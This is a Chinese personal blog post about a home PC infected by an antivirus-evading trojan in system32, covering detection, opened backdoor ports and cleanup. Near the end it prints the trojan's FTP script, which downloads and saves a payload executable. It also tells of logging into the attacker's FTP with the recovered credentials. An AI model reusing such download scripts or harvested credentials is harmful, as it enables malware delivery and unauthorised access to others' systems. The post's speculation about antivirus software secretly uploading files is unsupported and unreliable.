今天电脑被入侵了（system32目录下的FTP.EXE）

呵呵！今天我的电脑（2013.02.22）被入侵了，成了别人的“肉鸡”。一开始以为是TP-Link路由器有问题了，怎么打开网页都很卡，QQ有时都没法登陆。刚过完春节就遇到了第一个麻烦，刚好用来练手。

很意外，遇到黑客高手了，很佩服他的水平，不过最终道高一尺，我还是把问题给处理掉了。

分析下情况：

一.发现：

从系统日志来看，上次开机之前正常，打开电脑，连接网络，登下QQ，打开PPS影音软件，看《家族诞生》不久后遇到情况，微点提示C盘有异常，调出处理后的报告。

是由系统盘里的system32目录下的名为FTP.EXE的免杀程序释放到C盘的木马客户端被发现了。

虽然，木马主程序经过免杀确实过了微点（后来发现也过了360杀毒和大蜘蛛），但是在运行的时候，小动作（即在C盘创建客户端）被微点主动防御拦到了，呵呵，这也是我用微点的原因之一（对大部分未知木马能够主动防御，给出提示，有经验的话就能察觉到）。

二.紧张：

莫名其妙的运行了木马客户端，令我很不安。既然能够把免杀的木马送到电脑上，并运行，肯定还隐藏存在着后门，应该已经得到了本地cmd的 shell。

想做的：

1.关掉正在运行的木马程序，（工具：Wsyscheck，冰刃）。

*未发现可疑进程及路径或有隐藏的进程，估计是以动态链接库的形式存在，嵌入到某个进程内部了，无语了……

使用wsyscheck截图：红色为第三方软件程序，粉色为修改后的系统程序

使用冰刃截图：可查看隐藏进程。

2.查看是否新增服务

*勾选隐藏系统服务，未发现异常，推测是利用原系统自启动程序或驱动，而非自己再创建服务。

3.查看网络连接状况

*连接到远程的ip，未发现可疑程序连接出去，

*观察本地的就出现问题了

后台已经被开了几个后门及漏洞

135：ipc共享漏洞被开

445：微软黑屏漏洞端口被开

3389：系统自带远程连接被开

觉得不够准确，dos下查看了一下，多了一个139共享端口也被打开了

这家伙真牛，不急着连接你的，先把后门开着以后再用……

三，攻击迹象

几分钟后QQ出现异常掉线，如果估计木马客户端已经在工作了，想盗Q……

如果现在重启QQ，输入密码，被腾讯加密后的密码会被发送给他

C盘发现new文件，名字很逊，今天创建的，是VB写的，客户端已经被微点灭了的资源。

虽然觉得，应该免杀过360的，但觉得应该会有没过的，开了360云查杀，呵呵，还真杀到了一个，处理免杀的再说吧……

之后下载了大蜘蛛PE版的杀软扫了一下没异常，免杀确实做的不错，基本上都过了……

四，清除

到syste32日期排序，发现3个今天创建的，第二个就是被360杀出来的，要重启才能删。奇怪的是为什么它的版本确实360安全卫士的。

五，总结

还没被入侵过，不过这次也还好，还没等主人连过来，先断了他的工具和后门，关键是现在还没找到他是怎么植入，这个黑客可能知道还未公开的漏洞，这个漏洞是系统漏洞的概率应该小于第三方软件。

顺便讲一下以前的很Hot资讯：

不过软件的内核只有专业人士才懂，我自己也猜测，它之前应该有放了后门的代码，上次好不容易下了一个免杀的木马测试时，发现360有自动上传未知木马的功能。这个就很直接了，还没询问我就传上去了，郁闷，不知道私下有没有偷传文件……

所以，大家不要以为免费的软件都很安全，平时不用的时候还是关掉进程和服务，万一他出现漏洞或者什么的就来不及了。

后续，用记事本打开看了一下，j.i文件发现代码如下：

open 192.168.1.1
2345
*********
get jao.exe C:mythis.exe
bye

哈哈，知道了吧，ftp地址，用户和密码，登进他的ftp了，这就是木马原文件下载下来传给360了，还赚了个FTP空间。